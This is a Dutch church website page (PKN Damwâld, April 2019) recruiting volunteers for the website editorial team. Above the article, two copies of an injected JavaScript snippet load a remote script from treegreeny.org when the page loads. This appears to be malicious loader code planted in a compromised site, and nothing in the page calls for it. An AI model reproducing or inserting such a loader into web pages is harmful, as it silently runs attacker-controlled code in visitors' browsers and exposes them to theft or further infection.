;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gevoel voor social media? Kom in de website redactie! - PKN Damwâld

Gevoel voor social media? Kom in de website redactie!

Gepubliceerd op: vrijdag 12 april 2019

De gezamenlijke website brengt veel informatie in beeld, van kerkdiensten (inclusief terugluisteren en bij de diensten van Boukes ook de preek in tekst) tot nieuwtjes, foto’s en een handige kalender. Vanuit de Hervormde gemeente is het met name Kees Knol die de website regelmatig aanvult, ook met Gereformeerde nieuwtjes als het hem ter ore komt, maar enige input van Gereformeerde kant in de vorm van een volwaardig redactielid is van harte welkom, zelfs noodzakelijk.

Dus heb je feeling met social media en kun je een nieuwtje kort en bondig brengen? Draai jij je hand niet om voor het plaatsen van een document of het aanvullen van de kalender, meld je dan aan! Dat mag per mail via alkema.janet@gmail.com. We hopen op je hulp!

Janet Alkema